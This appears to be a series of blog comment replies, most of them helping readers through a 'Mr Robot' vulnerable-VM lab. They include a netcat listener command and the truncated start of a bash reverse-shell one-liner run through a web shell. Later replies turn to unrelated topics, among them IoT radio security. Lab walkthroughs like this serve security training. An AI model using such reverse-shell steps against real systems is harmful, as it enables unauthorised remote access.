This wasn’t a 100% shot in the dark — we’d figured out ‘bill’ was a user by trying:
ls -l /home
But trying ssh here was broadly an act of desperation since I couldn’t figure out (and still haven’t figured out) exactly how the web shell was filtering commands.
So just to check we’re trying the same things here:
On your attacking machine you run:
nc -lvp 443
to set up the netcat listener.
Then on your target machine you execute (in the limited webshell):
echo ‘bash -i >&…
How are you determining the IP address you’re attacking? 10.0.2.4 was just the address that my VM picked up but yours will likely be different.
There are a number of ways that you could determine the address that your VM has picked up:
Hi — do you mean right at the very beginning? As in getting the initial ‘Mr Robot’ page to load once you’ve identified the IP in your lab?
If this is the case then I would check the hash on the VM you downloaded as it might have been corrupted. If you find the correct IP address and point your browser to it then you will get the default webpage.
> I still don’t think you know if it’s accidental, a one off, a systematic issue or deliberate.
Wasn’t that part of the point, though?
Whose responsibility is it to establish these facts? The victims? The bystanders? The regulator?
Hi — interesting idea on the second radio channel, but doesn’t this just perpetuate the initial problem — that of insecure implementation of comms — rather than solve it?
If I, a low-cost, high-volume IoT device manufacturer, cannot or will not implement the correct security controls on my primary radio, why would I a) add a…